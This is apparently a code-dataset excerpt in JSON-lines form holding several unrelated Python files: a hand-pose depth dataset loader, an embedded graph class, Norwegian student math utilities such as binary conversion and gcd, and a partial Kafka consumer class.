= np.array(palm).T\n # Xmax, Xmin = np.max(Xs), np.min(Xs)\n # Ymax, Ymin = np.max(Ys), np.min(Ys)\n #\n # orientation = None\n # s_c = None # start_color\n # d_c = None # end_color\n # wrist = np.array([palm[0], palm[1]]).T\n # if Xmax in wrist[0]:\n # orientation = \"leftRight\"\n # s_c = avg_color_upper\n # d_c = avg_color_lower\n # elif Xmin in wrist[0]:\n # orientation = \"RightLeft\"\n # s_c = avg_color_lower\n # d_c = avg_color_upper\n # elif Ymax in wrist[1]:\n # orientation = \"TopDown\"\n # s_c = avg_color_upper\n # d_c = avg_color_lower\n # else:\n # orientation = \"BottomUp\"\n # s_c = avg_color_lower\n # d_c = avg_color_upper\n #\n # n_step = Xmax - Xmin if 'left' in orientation.lower() else Ymax - Ymin\n #\n # gradient_offset = np.abs(avg_color_lower - avg_color_upper) / n_step\n #\n # def add(x, y):\n # return x+y\n # def minus(x,y):\n # return x-y\n #\n # color_operation = minus if s_c > d_c else add\n #\n # for i in range(int(n_step)):\n # s_c = color_operation(s_c, i * gradient_offset)\n # if 'left' in orientation.lower():\n # canvas[:, Xmin + i] = s_c\n # else:\n # canvas[Ymin +i, :] = s_c\n #\n # canvas = np.multiply(canvas, binary_mask)\n # else:\n if len(palm_colors):\n pass\n # cv2.fillPoly(canvas, np.array([palm], dtype=np.int32), np.average(palm_colors))\n\n\n\n for connection, color in bones:\n temp_canvas = np.zeros(canvas.shape)\n coord1 = uv_coord[connection[0]]\n coord2 = uv_coord[connection[1]]\n coords = np.stack([coord1, coord2])\n colors = [depth[connection[0]], depth[connection[1]]]\n if -1 in colors or len(colors) == 0:\n continue\n else:\n color = np.average(colors)\n # 0.5, 0.5 is the center\n x = coords[:, 0]\n y = coords[:, 1]\n mX = x.mean()\n mY = y.mean()\n length = ((x[0] - x[1]) ** 2 + (y[0] - y[1]) ** 2) ** 0.5\n angle = np.math.degrees(np.math.atan2(y[0] - y[1], x[0] - x[1]))\n radius = 2\n polygon = cv2.ellipse2Poly((int(mX), int(mY)), (int(length / 3), radius), int(angle), 0, 360, 1)\n cv2.fillConvexPoly(temp_canvas, polygon, color)\n canvas = np.maximum(canvas, temp_canvas)\n\n return canvas\n\n\ndef normalize(image, min_value, max_value):\n # image = cv2.normalize(image, None, alpha=1.0, norm_type=cv2.NORM_MINMAX)\n # inverted_image = np.abs(image - 1.0)\n image = (image - min_value) / (max_value - min_value)\n image[image < 0] = 0\n return image\n\n\ndef gaussian_kernel(height, width, x, y, sigma):\n gridy, gridx = np.mgrid[0:width, 0:height]\n D2 = (gridx - x) ** 2 + (gridy - y) ** 2\n return np.exp(-D2 / 2.0 / sigma / sigma)\n\n\ndef generate_heatmap(x, y, width, height, sigma, depth, max_depth=700):\n # centermap = np.zeros((height, width, 1), dtype=np.float32)\n center_map = gaussian_kernel(width, height, x, y, sigma)\n # print(center_map.shape)\n center_map[center_map > 1] = 1\n center_map[center_map < 0.0099] = 0\n center_map *= depth\n # centermap[:, :, 0] = center_map\n\n return center_map\n\n\nclass V2VVoxelization(object):\n def __init__(self, cubic_size, augmentation=True):\n self.cubic_size = cubic_size\n self.cropped_size, self.original_size = 64, 96\n self.sizes = (self.cubic_size, self.cropped_size, self.original_size)\n self.pool_factor = 2\n self.std = 1.7\n self.augmentation = augmentation\n\n output_size = int(self.cropped_size / self.pool_factor)\n # Note, range(size) and indexing = 'ij'\n self.d3outputs = np.meshgrid(np.arange(output_size), np.arange(output_size), np.arange(output_size),\n indexing='ij')\n\n def __call__(self, sample):\n points, keypoints, refpoint = sample['points'], sample['keypoints'], 
sample['refpoint']\n\n ## Augmentations\n # Resize\n new_size = np.random.rand() * 40 + 80\n\n # Rotation\n angle = np.random.rand() * 80 / 180 * np.pi - 40 / 180 * np.pi\n\n # Translation\n trans = np.random.rand(3) * (self.original_size - self.cropped_size)\n\n if not self.augmentation:\n new_size = 100\n angle = 0\n trans = self.original_size / 2 - self.cropped_size / 2\n\n input = generate_cubic_input(points, refpoint, new_size, angle, trans, self.sizes)\n keypointsVoxel = generate_cubic_hand(keypoints, refpoint, new_size, angle, trans, self.sizes)\n # keypointsVoxel = generate_cubic_input(keypoints, refpoint, new_size, angle, trans, self.sizes)\n\n keypoints = generate_coord(keypoints, refpoint, new_size, angle, trans, self.sizes)\n # heatmap = generate_heatmap_gt(keypoints, refpoint, new_size, angle, trans, self.sizes, self.d3outputs,\n # self.pool_factor, self.std)\n\n return input.reshape((1, *input.shape)), keypoints, keypointsVoxel.reshape(\n (1, *keypointsVoxel.shape)) # , heatmap\n\n def voxelize(self, points, refpoint):\n new_size, angle, trans = 100, 0, self.original_size / 2 - self.cropped_size / 2\n input = generate_cubic_input(points, refpoint, new_size, angle, trans, self.sizes)\n return input.reshape((1, *input.shape))\n\n def generate_heatmap(self, keypoints, refpoint):\n new_size, angle, trans = 100, 0, self.original_size / 2 - self.cropped_size / 2\n heatmap = generate_heatmap_gt(keypoints, refpoint, new_size, angle, trans, self.sizes, self.d3outputs,\n self.pool_factor, self.std)\n return heatmap\n\n def evaluate(self, heatmaps, refpoints):\n coords = extract_coord_from_output(heatmaps)\n coords *= self.pool_factor\n keypoints = warp2continuous(coords, refpoints, self.cubic_size, self.cropped_size)\n return keypoints\n\n\nclass MSRAHandDataset(BaseDataset):\n\n @staticmethod\n def modify_commandline_options(parser, is_train):\n parser.add_argument(\"--num_keypoints\", type=int, default=21)\n parser.add_argument('--centerdir', type=str, default=f\"datasets/msra_center\")\n return parser\n\n def __init__(self, opt):\n super(MSRAHandDataset, self).__init__(opt)\n self.img_width = 320\n self.img_height = 240\n self.min_depth = 100\n self.max_depth = 700\n self.fx = 241.42\n self.fy = 241.42\n self.joint_num = 21\n self.world_dim = 3\n self.folder_list = ['1', '2', '3', '4', '5', '6', '7', '8', '9',\n 'I', 'IP', 'L', 'MP', 'RP', 'T', 'TIP', 'Y']\n self.subject_num = 9\n\n self.root = opt.dataroot\n self.center_dir = f\"../datasets/legacy_datasets/msra_hand/center\"\n self.test_subject_id = 3\n self.mode = 'train' if opt.isTrain else 'test'\n self.transform = V2VVoxelization(200, True)\n\n self.updatable_rot = 0.6\n self.step_rot = 0.05\n\n if not self.mode in ['train', 'test']: raise ValueError('Invalid mode')\n assert self.test_subject_id >= 0 and self.test_subject_id < self.subject_num\n\n if not self._check_exists(): raise RuntimeError('Invalid MSRA hand dataset')\n\n self._load()\n\n def __getitem__(self, index):\n crop_dim = 256\n xyz = self.joints_world[index]\n z = xyz[:, -1]\n uv = world2pixel(xyz[:, 0], xyz[:, 1], xyz[:, 2], self.img_width, self.img_height, self.fx, self.fy)\n\n depthmap, trans = load_depthmap(self.names[index], self.img_width, self.img_height, self.max_depth, crop_dim, self.updatable_rot, uv)\n # points = depthmap2points(depthmap, self.fx, self.fy)\n # points = points.reshape((-1, 3))\n\n for i, pair in enumerate(uv):\n uv[i] = affine_transform(pair, trans)\n\n # depth inversion\n depthmap = np.ones(depthmap.shape) * 700.0 - depthmap\n z = 
np.ones(z.shape) * 700 - z\n max_value = 700\n min_value = 0\n\n heatmaps_image = np.zeros((crop_dim, crop_dim))\n heatmaps = []\n ordermap = np.zeros((crop_dim, crop_dim))\n z_norms = []\n for i, (x, y) in enumerate(uv):\n if x >= crop_dim or y >= crop_dim or x < 0 or y < 0:\n z_norms.append(-1)\n heatmaps.append(np.zeros(depthmap.shape))\n continue\n z_value = depthmap[int(y), int(x)] if depthmap[int(y), int(x)] > 0 else z[i]\n z_norm = (z_value - min_value) / (max_value - min_value)\n z_norms.append(z_norm)\n\n gaussian_map = generate_heatmap(x, y, crop_dim, crop_dim, 2.5, 1)\n\n heatmaps.append(gaussian_map)\n heatmaps_image = np.maximum(gaussian_map * z_norm, heatmaps_image)\n\n jointsmap = np.squeeze(generate_jointsmap(uv, z_norms, crop_dim, crop_dim, 1))\n heatmaps_image = np.maximum(heatmaps_image, jointsmap)\n\n heatmaps = np.stack(heatmaps)\n z_norms = [[i] for i in z_norms]\n sample = {\n # 'name': self.names[index],\n 'depthmap': normalize(depthmap, min_value, max_value),\n 'heatmaps': heatmaps_image,\n 'gaussian_pts': heatmaps,\n 'refpoint': self.ref_pts[index],\n 'fx': self.fx,\n 'fy': self.fy,\n 'trans': trans,\n 'xyz': xyz,\n 'uv': uv,\n 'z': z_norms\n }\n\n sample = self._transform(sample)\n\n return sample\n\n def __len__(self):\n return self.num_samples\n\n def _load(self):\n self._compute_dataset_size()\n\n self.num_samples = self.train_size if self.mode == 'train' else self.test_size\n self.joints_world = np.zeros((self.num_samples, self.joint_num, self.world_dim))\n self.ref_pts = np.zeros((self.num_samples, self.world_dim))\n self.names = []\n\n # Collect reference center points strings\n if self.mode == 'train':\n ref_pt_file = 'center_train_' + str(self.test_subject_id) + '_refined.txt'\n else:\n ref_pt_file = 'center_test_' + str(self.test_subject_id) + '_refined.txt'\n\n with open(os.path.join(self.center_dir, ref_pt_file)) as f:\n ref_pt_str = [l.rstrip() for l in f]\n\n #\n file_id = 0\n frame_id = 0\n\n for mid in range(self.subject_num):\n if self.mode == 'train':\n model_chk = (mid != self.test_subject_id)\n elif self.mode == 'test':\n model_chk = (mid == self.test_subject_id)\n else:\n raise RuntimeError('unsupported mode {}'.format(self.mode))\n\n if model_chk:\n for fd in self.folder_list:\n annot_file = os.path.join(self.root, 'P' + str(mid), fd, 'joint.txt')\n\n lines = []\n with open(annot_file) as f:\n lines = [line.rstrip() for line in f]\n\n # skip first line\n for i in range(1, len(lines)):\n # referece point\n splitted = ref_pt_str[file_id].split()\n if splitted[0] == 'invalid':\n print('Warning: found invalid reference frame')\n file_id += 1\n continue\n else:\n self.ref_pts[frame_id, 0] = float(splitted[0])\n self.ref_pts[frame_id, 1] = float(splitted[1])\n self.ref_pts[frame_id, 2] = float(splitted[2])\n\n # joint point\n splitted = lines[i].split()\n for jid in range(self.joint_num):\n self.joints_world[frame_id, jid, 0] = float(splitted[jid * self.world_dim])\n self.joints_world[frame_id, jid, 1] = float(splitted[jid * self.world_dim + 1])\n self.joints_world[frame_id, jid, 2] = -float(splitted[jid * self.world_dim + 2])\n\n filename = os.path.join(self.root, 'P' + str(mid), fd, '{:0>6d}'.format(i - 1) + '_depth.bin')\n self.names.append(filename)\n\n frame_id += 1\n file_id += 1\n\n def _compute_dataset_size(self):\n self.train_size, self.test_size = 0, 0\n\n for mid in range(self.subject_num):\n num = 0\n for fd in self.folder_list:\n annot_file = os.path.join(self.root, 'P' + str(mid), fd, 'joint.txt')\n with open(annot_file) as f:\n num = 
int(f.readline().rstrip())\n if mid == self.test_subject_id:\n self.test_size += num\n else:\n self.train_size += num\n\n def _check_exists(self):\n # Check basic data\n for mid in range(self.subject_num):\n for fd in self.folder_list:\n\n annot_file = os.path.join(self.root, 'P' + str(mid), fd, 'joint.txt')\n # print(f\"fd: {fd}\")\n # print(f\"annofile: {annot_file}\")\n if not os.path.exists(annot_file):\n print('Error: annotation file {} does not exist'.format(annot_file))\n return False\n\n # Check precomputed centers by v2v-hand model's author\n for subject_id in range(self.subject_num):\n center_train = os.path.join(self.center_dir, 'center_train_' + str(subject_id) + '_refined.txt')\n center_test = os.path.join(self.center_dir, 'center_test_' + str(subject_id) + '_refined.txt')\n if not os.path.exists(center_train) or not os.path.exists(center_test):\n print('Error: precomputed center files do not exist')\n return False\n\n return True\n\n def _transform(self, sample):\n for k, v in sample.items():\n sample[k] = torch.tensor(v, dtype=torch.float32)\n if k in ['depthmap', 'heatmaps']:\n sample[k] = torch.unsqueeze(sample[k], dim=0)\n return sample\n","sub_path":"nearest_neighbor_search/data/msrahand_dataset.py","file_name":"msrahand_dataset.py","file_ext":"py","file_size_in_byte":31570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"430289262","text":"#!/usr/bin/python\n\nfrom graph import *\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\nEMBEDDING_TOLERANCE = 1e-2 # values differing by tolerance are equal\n\nclass EmbeddedGraph(Graph):\n def __init__(self):\n Graph.__init__(self)\n self.x = []\n self.y = []\n\n def plot(self):\n plt.plot(self.x,self.y,'bo')\n for edge in self.e:\n xe = [self.x[edge[0]],self.x[edge[1]]]\n ye = [self.y[edge[0]],self.y[edge[1]]]\n plt.plot(xe,ye,\"r-\")\n\n def nearest_node(self,x,y):\n i_min = 0\n ds_min = 1e20\n for i in range(self.n):\n x1 = self.x[i]\n y1 = self.y[i]\n dx = x1-x\n dy = y1-y\n ds = np.sqrt(dx*dx + dy*dy)\n\n if(ds < ds_min):\n ds_min = ds\n i_min = i\n\n return (i_min, ds_min)\n\n\n def add_node(self,x,y):\n [i,ds] = self.nearest_node(x,y)\n if(ds < EMBEDDING_TOLERANCE):\n return\n\n self.v.append(self.n)\n self.n += 1\n self.x.append(x)\n self.y.append(y)\n \n def add_edge(self,i,j):\n if(not [i,j] in self.e and not [j,i] in self.e):\n self.e.append([i,j])\n\n\ndef get_connected_embedded_subgraphs(g0):\n subgraphs = get_connected_subgraphs(g0)\n\n embedded_subgraphs = []\n\n for subg in subgraphs:\n embsubg = EmbeddedGraph()\n\n embsubg.n = subg.n\n embsubg.v = list(range(subg.n))\n for edge in subg.e:\n i = subg.v.index(edge[0])\n j = subg.v.index(edge[1])\n embsubg.add_edge(i,j)\n for i in range(subg.n):\n embsubg.x.append(g0.x[subg.v[i]])\n embsubg.y.append(g0.y[subg.v[i]])\n\n embedded_subgraphs.append(embsubg)\n\n return embedded_subgraphs\n\n\n","sub_path":"embeddedgraph.py","file_name":"embeddedgraph.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388169911","text":"import math\n#Denne funksjonen tar inn et tall, og en liste med tall som brukes som\n#denominatorer. 
eksempel på funksjonskall: GraadigeAlgoritmen(200, [25, 10, 5, 1]\ndef GraadigeAlgoritmen(number, denominatorList):\n split = denominatorList\n res = []\n rest = number\n for x in range(len(split)):\n res.append(0)\n current = 0\n toomuch = False\n count = 1\n for x in range(len(split)):\n count = 1\n toomuch = False\n while not toomuch:\n current = count * split[x]\n if(current > rest):\n toomuch = True\n rest = rest - ((count -1)*split[x])\n else:\n res[x] = count\n count +=1\n return res\n\n#Denne funksjonen tar inn et tall, og returnerer True eller False avhengig om \n# det er et primtall eller ikke. Den fungerer, men er ikke veldig elegant, og\n#tar lang tid på større tall. Skal endre den til at den sjekker opp mot\n#roten av tallet, og ikke alle tall opp til tallet\ndef IsPrime(tall):\n prime = True\n for x in range(2, tall):\n if(tall%x==0):\n prime = False\n return prime\n\n#Dette er en slags utvidet input funksjon. Det kjekke med denne funksjonen er\n#at den vil spørre på nytt hvis inputen fra brukeren ikke tilfredstiller\n#kravene. Du slipper altså å ende opp med en programstoppende valueerror,\n#fordi inputen fra en bruker fører til at du prøver å legge sammen\n# 3e4a + ^*:\n#Eksempel: InputCheck('int', 'Skriv inn et heltall', 'Du skrev IKKE inn et\n# heltall, prøv igjen')\ndef InputCheck(dataType, prompt, errorMsg):\n a = 0\n while True:\n if(dataType == 'int'):\n try:\n a = int(input(prompt))\n break\n except ValueError:\n print(errorMsg)\n elif(dataType == 'string'):\n try:\n a = str(input(prompt))\n break\n except ValueError:\n print(errorMsg)\n elif(dataType == 'float'):\n try:\n a = float(input(prompt))\n break\n except ValueError:\n print(errorMsg)\n elif(dataType == 'bin'):\n a = input(prompt)\n a = str(a)\n invalChar = False\n for x in range(len(a)):\n if(a[x] != '0' and a[x] != '1'):\n invalChar = True\n break\n if(invalChar == False):\n break\n else:\n print(errorMsg)\n return a\n\n#Denne algoritmen tar inn et tall i titallssystemet, og gjør det til et\n#binært tall(totalssystemet)\ndef ToBin(tall):\n less = True\n i = 0\n rest = tall\n product = ''\n while less:\n if(math.pow(2,i) > tall):\n less = False\n i = i-1\n break\n i+=1\n for x in range(i,-1,-1):\n if(math.pow(2,i) <= rest):\n product += '1'\n rest = rest - math.pow(2,i)\n else:\n product += '0'\n i-=1\n return product\n \n#Denne funskjonen tar inn et binært tall, og gjør det om til et tall i\n#titallssystemet\ndef FromBin(tall):\n tall = str(tall)\n tiTall = 0\n for x in range(len(tall)):\n if(int(tall[x])==1):\n tiTall += int(math.pow(2,(len(tall)-1)-x))\n return tiTall\n\n#De neste funksjonene har ikke veldig stor praktisk betydning.\n#De tar seg av ting som å konvertere strenger til lister med\n#ascii-verdien av tegnene i strengen, og gjøre om de verdiene til\n#binære tall. 
Noen av de tar seg av formattering av de binære tallene\ndef StringToChar(string):\n chars = []\n for x in range(len(string)):\n chars.append(ord(string[x]))\n return chars\n\ndef CharToBin(charList):\n bins = []\n for x in range(len(charList)):\n bins.append(ToBin(charList[x]))\n return bins\n\ndef RevKonkat(string, extras):\n zeros = ''\n string = str(string)\n for x in range(extras):\n zeros += '0'\n result = zeros + string\n return result\ndef GetLargestLenght(strList):\n if(len(strList)>=1): \n maxLen = len(strList[0])\n else:\n maxLen = 0\n for x in range(1, len(strList)):\n if(len(strList[x]) > (len(strList[x-1]))):\n maxLen = len(strList[x])\n return maxLen\n\n\ndef MakeEvenList(strList):\n maxLen = GetLargestLenght(strList)\n for x in range(len(strList)):\n strList[x] = RevKonkat(strList[x], (maxLen - len(strList[x])))\n return strList\n#Denne funkjsonen knytter alle funskjonene ovenfor sammen. Den tar\n#inn en streng, og vil returnere en streng som er en binær\n#representasjon av ascii-verdien til hvert tegn i parameterstringen\n#den vil legge på nuller forran tegn slik at alle tegnene vil ha\n#like mange siffer. Tanken var at også å reversere disse funskjonene\n#slik at man kunne ende opp med den opprinnelige strengen, men\n#jeg har ikke kommet så langt\ndef StringToBin(string):\n binList = MakeEvenList(CharToBin(StringToChar(string)))\n outString = ''\n for x in range(len(binList)):\n outString += binList[x]\n return outString\n\n#Denne tar fakultet av et tall (n!) \ndef Fakultet(tall):\n summen = 1\n for x in range(1,(tall+1)):\n summen = summen * x\n return summen\n\n#denne ble lagd med tanke på øvingen der du skulle finne antall nuller\n#på slutten av 100! denne funksjonen returnerer nemlig hvor mange nuller\n#som finnes på slutten av et tall.\n# TIPS: skriv \"FindEndZeros(Fakultet(100))\" for å finne antall nuller\n#på slutten av 100!\ndef FindEndZeros(tall):\n tall = str(tall)\n zero = 0\n for x in range(len(tall)):\n if(tall[x] == '0'):\n zero += 1\n else:\n zero = 0\n return zero\n\n#Denne funksjonen tar inn to tall og bruker den euklidske algoritmen\n#for å finne greatest common divisor\ndef gcd(tall1, tall2):\n a= tall1\n b= tall2\n holder = 0\n gcd = 0\n done = False\n while not done:\n holder = a\n a = b\n b = holder%b\n if(b==0):\n gcd = a\n done = True\n return gcd\n\n#denne finner least common multiple\ndef lcm(tall1, tall2):\n a = 2\n while True:\n if(a*tall1%tall2 ==0):\n break\n a += 1\n a = a*tall1\n return a\n\n#========================= updated 30.09.13 ===========================\n\n#tar inn to tall og deler de med greatest common divisor til tallene\n#returnerer tallene hver for seg\ndef ReduceFraction(tall1, tall2):\n divisor = gcd(tall1, tall2)\n tall1 = tall1 / divisor\n tall2 = tall2 / divisor\n return tall1, tall2\n\n\n#Denne returnerer en liste med en fibbonaccirekke frem til et gitt tall\ndef FibbonacciList(endNumber):\n fibList = []\n if(endNumber == 1):\n fibList = [0]\n \n elif(endNumber ==2):\n fibList = [0,1]\n else: \n fibList = [0,1] \n \n for x in range(2, endNumber+1):\n fibList.append(fibList[x-1] + fibList[x-2])\n\n return fibList\n \n \n\n\n\n\n\n","sub_path":"øving 6/BPfunctions.py","file_name":"BPfunctions.py","file_ext":"py","file_size_in_byte":7010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"151331097","text":"#!/usr/bin/env python\n# coding: utf-8\n# Copyright (c) Qotto, 2019\n\n\"\"\" KafkaConsumer class\n\nThis class consume event / command / result in Kafka 
topics.\n\nTodo:\n * In function listen_store_records, add commit store (later V2)\n\"\"\"\n\nimport asyncio\nimport json\nfrom logging import Logger, getLogger\nfrom typing import List, Dict, Any, Union\n\nfrom aiokafka import (AIOKafkaConsumer)\nfrom aiokafka.errors import (IllegalStateError, UnsupportedVersionError, CommitFailedError,\n KafkaError, KafkaTimeoutError)\nfrom kafka.errors import KafkaConnectionError\n\nfrom tonga.models.handlers.command.command_handler import BaseCommandHandler\nfrom tonga.models.handlers.event.event_handler import BaseEventHandler\nfrom tonga.models.handlers.result.result_handler import BaseResultHandler\nfrom tonga.models.records.base import BaseRecord\nfrom tonga.models.store.base import BaseStoreRecordHandler\nfrom tonga.models.store.store_record import StoreRecord\nfrom tonga.services.consumer.base import BaseConsumer\nfrom tonga.services.consumer.errors import (ConsumerConnectionError, AioKafkaConsumerBadParams,\n KafkaConsumerError, ConsumerKafkaTimeoutError,\n IllegalOperation, TopicPartitionError,\n NoPartitionAssigned, OffsetError, UnknownStoreRecordHandler,\n UnknownHandler, UnknownHandlerReturn,\n HandlerException, KafkaConsumerAlreadyStartedError,\n KafkaConsumerNotStartedError)\nfrom tonga.services.coordinator.assignors.statefulset_assignors import StatefulsetPartitionAssignor\nfrom tonga.services.coordinator.client.kafka_client import KafkaClient\nfrom tonga.services.coordinator.transaction.kafka_transaction import (KafkaTransactionalManager,\n KafkaTransactionContext)\nfrom tonga.services.errors import BadSerializer\nfrom tonga.services.serializer.base import BaseSerializer\nfrom tonga.services.serializer.kafka_key import KafkaKeySerializer\nfrom tonga.stores.manager.base import BaseStoreManager\nfrom tonga.stores.manager.errors import UninitializedStore\nfrom tonga.models.structs.positioning import (BasePositioning, KafkaPositioning)\n\n__all__ = [\n 'KafkaConsumer',\n]\n\n\nclass KafkaConsumer(BaseConsumer):\n \"\"\"KafkaConsumer is a client that publishes records to the Kafka cluster.\n \"\"\"\n _client: KafkaClient\n serializer: BaseSerializer\n _bootstrap_servers: Union[str, List[str]]\n _client_id: str\n _topics: List[str]\n _group_id: str\n _auto_offset_reset: str\n _max_retries: int\n _retry_interval: int\n _retry_backoff_coeff: int\n _isolation_level: str\n _assignors_data: Dict[str, Any]\n _store_manager: BaseStoreManager\n _running: bool\n _kafka_consumer: AIOKafkaConsumer\n _transactional_manager: KafkaTransactionalManager\n\n __current_offsets: Dict[str, BasePositioning]\n __last_offsets: Dict[str, BasePositioning]\n __last_committed_offsets: Dict[str, BasePositioning]\n\n _loop: asyncio.AbstractEventLoop\n logger: Logger\n\n def __init__(self, client: KafkaClient, serializer: BaseSerializer, topics: List[str],\n loop: asyncio.AbstractEventLoop, client_id: str = None, group_id: str = None,\n auto_offset_reset: str = 'earliest', max_retries: int = 10, retry_interval: int = 1000,\n retry_backoff_coeff: int = 2, assignors_data: Dict[str, Any] = None,\n store_manager: BaseStoreManager = None, isolation_level: str = 'read_uncommitted',\n transactional_manager: KafkaTransactionalManager = None) -> None:\n \"\"\"\n KafkaConsumer constructor\n\n Args:\n client (KafkaClient): Initialization class (contains, client_id / bootstraps_server)\n serializer (BaseSerializer): Serializer encode & decode event\n topics (List[str]): List of topics to subscribe to\n loop (asyncio.AbstractEventLoop): Asyncio loop\n client_id (str): Client name (if 
is none, KafkaConsumer use KafkaClient client_id)\n group_id (str): name of the consumer group, and to use for fetching and committing offsets.\n If None, offset commits are disabled\n auto_offset_reset (str): A policy for resetting offsets on OffsetOutOfRange errors: ‘earliest’ will move to\n the oldest available message, ‘latest’ will move to the most recent.\n Any other value will raise the exception\n max_retries (int): Number of retries before critical failure\n retry_interval (int): Interval before next retries\n retry_backoff_coeff (int): Backoff coeff for next retries\n assignors_data (Dict[str, Any]): Dict with assignors information, more details in\n StatefulsetPartitionAssignor\n store_manager (BaseStoreManager): If this store_manager is set, consumer call initialize_store_manager()\n otherwise listen_event was started\n isolation_level (str): Controls how to read messages written transactionally. If set to read_committed,\n will only return transactional messages which have been committed.\n If set to read_uncommitted, will return all messages, even transactional messages\n which have been aborted. Non-transactional messages will be returned unconditionally\n in either mode.\n\n Returns:\n None\n \"\"\"\n super().__init__()\n self.logger = getLogger('tonga')\n\n # Register KafkaClient\n self._client = client\n\n # Set default assignors_data if is None\n if assignors_data is None:\n assignors_data = {}\n\n # Create client_id\n if client_id is None:\n self._client_id = self._client.client_id + '-' + str(self._client.cur_instance)\n else:\n self._client_id = client_id\n\n if isinstance(serializer, BaseSerializer):\n self.serializer = serializer\n else:\n raise BadSerializer\n\n self._bootstrap_servers = self._client.bootstrap_servers\n self._topics = topics\n self._group_id = group_id\n self._auto_offset_reset = auto_offset_reset\n self._max_retries = max_retries\n self._retry_interval = retry_interval\n self._retry_backoff_coeff = retry_backoff_coeff\n self._isolation_level = isolation_level\n self._assignors_data = assignors_data\n self._store_manager = store_manager\n self._running = False\n self._loop = loop\n\n self.__current_offsets = dict()\n self.__last_offsets = dict()\n self.__last_committed_offsets = dict()\n\n self._transactional_manager = transactional_manager\n\n try:\n self.logger.info(json.dumps(assignors_data))\n statefulset_assignor = StatefulsetPartitionAssignor(bytes(json.dumps(assignors_data), 'utf-8'))\n self._kafka_consumer = AIOKafkaConsumer(*self._topics, loop=self._loop,\n bootstrap_servers=self._bootstrap_servers,\n client_id=self._client_id, group_id=group_id,\n value_deserializer=self.serializer.decode,\n auto_offset_reset=self._auto_offset_reset,\n isolation_level=self._isolation_level, enable_auto_commit=False,\n key_deserializer=KafkaKeySerializer.decode,\n partition_assignment_strategy=[statefulset_assignor])\n except KafkaError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n except ValueError as err:\n self.logger.exception('%s', err.__str__())\n raise AioKafkaConsumerBadParams\n self.logger.debug('Create new consumer %s, group_id %s', self._client_id, group_id)\n\n async def start_consumer(self) -> None:\n \"\"\"\n Start consumer\n\n Returns:\n None\n\n Raises:\n AttributeError: KafkaConsumerError\n ValueError: If KafkaError or KafkaTimoutError is raised, exception value is contain\n in KafkaConsumerError.msg\n \"\"\"\n if self._running:\n raise KafkaConsumerAlreadyStartedError\n for retry in range(2):\n try:\n await 
self._kafka_consumer.start()\n self._running = True\n self.logger.debug('Start consumer : %s, group_id : %s, retry : %s', self._client_id, self._group_id,\n retry)\n except KafkaTimeoutError as err:\n self.logger.exception('%s', err.__str__())\n await asyncio.sleep(1)\n except KafkaConnectionError as err:\n self.logger.exception('%s', err.__str__())\n await asyncio.sleep(1)\n except KafkaError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n else:\n break\n else:\n raise ConsumerConnectionError\n\n async def stop_consumer(self) -> None:\n \"\"\"\n Stop consumer\n\n Returns:\n None\n\n Raises:\n AttributeError: KafkaConsumerError\n ValueError: If KafkaError is raised, exception value is contain\n in KafkaConsumerError.msg\n \"\"\"\n if not self._running:\n raise KafkaConsumerNotStartedError\n try:\n await self._kafka_consumer.stop()\n self._running = False\n self.logger.debug('Stop consumer : %s, group_id : %s', self._client_id, self._group_id)\n except KafkaTimeoutError as err:\n self.logger.exception('%s', err.__str__())\n raise ConsumerKafkaTimeoutError\n except KafkaError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n\n def is_running(self) -> bool:\n return self._running\n\n async def get_last_committed_offsets(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Get last committed offsets\n\n Returns:\n Dict[str, KafkaPositioning]: Contains all assigned partitions with last committed offsets\n \"\"\"\n last_committed_offsets: Dict[str, BasePositioning] = dict()\n self.logger.debug('Get last committed offsets')\n if self._group_id is None:\n raise IllegalOperation\n for tp in self._kafka_consumer.assignment():\n offset = await self._kafka_consumer.committed(tp)\n last_committed_offsets[KafkaPositioning.make_class_assignment_key(tp.topic, tp.partition)] = \\\n KafkaPositioning(tp.topic, tp.partition, offset)\n return last_committed_offsets\n\n async def get_current_offsets(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Get current offsets\n\n Returns:\n Dict[str, KafkaPositioning]: Contains all assigned partitions with current offsets\n \"\"\"\n current_offsets: Dict[str, BasePositioning] = dict()\n self.logger.debug('Get current offsets')\n for tp in self._kafka_consumer.assignment():\n try:\n offset = await self._kafka_consumer.position(tp)\n current_offsets[KafkaPositioning.make_class_assignment_key(tp.topic, tp.partition)] = \\\n KafkaPositioning(tp.topic, tp.partition, offset)\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n return current_offsets\n\n async def get_beginning_offsets(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Get beginning offsets\n\n Returns:\n Dict[str, KafkaPositioning]: Contains all assigned partitions with beginning offsets\n \"\"\"\n beginning_offsets: Dict[str, BasePositioning] = dict()\n self.logger.debug('Get beginning offsets')\n for tp in self._kafka_consumer.assignment():\n try:\n offset = (await self._kafka_consumer.beginning_offsets([tp]))[tp]\n beginning_offsets[KafkaPositioning.make_class_assignment_key(tp.topic, tp.partition)] = \\\n KafkaPositioning(tp.topic, tp.partition, offset)\n except KafkaTimeoutError as err:\n self.logger.exception('%s', err.__str__())\n raise ConsumerKafkaTimeoutError\n except UnsupportedVersionError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n return beginning_offsets\n\n async def get_last_offsets(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Get last offsets\n\n Returns:\n Dict[str, KafkaPositioning]: Contains all 
